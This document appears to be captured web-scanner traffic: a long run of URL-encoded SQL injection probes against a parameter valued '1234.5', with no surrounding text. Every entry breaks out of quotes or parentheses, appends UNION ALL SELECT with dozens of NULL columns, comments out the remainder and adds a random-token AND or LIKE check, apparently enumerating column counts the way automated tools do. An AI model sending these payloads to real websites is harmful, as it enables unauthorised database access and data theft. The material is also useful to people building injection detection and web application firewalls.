1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27RlAB%27%3D%27RlAB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27WeXV%27%3D%27WeXV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27DiWl%27%3D%27DiWl 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27BhDp%27%3D%27BhDp 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27KCbh%27%3D%27KCbh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27ebHF%27%3D%27ebHF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27bgsp%27%3D%27bgsp 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27tHBW%27%3D%27tHBW 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27oyaB%27%3D%27oyaB 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27LpXD%27%3D%27LpXD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27rjgA%27%3D%27rjgA 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hAvu%27%3D%27hAvu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27nWsL%27%3D%27nWsL 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27ewEd%27%3D%27ewEd 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27qjHP%27%3D%27qjHP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27lceu%27%3D%27lceu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27LXKN%27%3D%27LXKN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27qKgp%27%3D%27qKgp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zNzf%27%3D%27zNzf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27JplI%27%20LIKE%20%27JplI 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27mgbB%27%20LIKE%20%27mgbB 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27EdCf%27%20LIKE%20%27EdCf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27qbJw%27%20LIKE%20%27qbJw 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27EUbg%27%20LIKE%20%27EUbg 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27sHsp%27%20LIKE%20%27sHsp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27LxGD%27%20LIKE%20%27LxGD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27bgUK%27%20LIKE%20%27bgUK 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27hbon%27%20LIKE%20%27hbon 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27tuqK%27%20LIKE%20%27tuqK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27MOpf%27%20LIKE%20%27MOpf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27dbaE%27%20LIKE%20%27dbaE 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27IbYy%27%20LIKE%20%27IbYy 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27QVTb%27%20LIKE%20%27QVTb 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27mklW%27%20LIKE%20%27mklW 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27goGX%27%20LIKE%20%27goGX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27sTcp%27%20LIKE%20%27sTcp 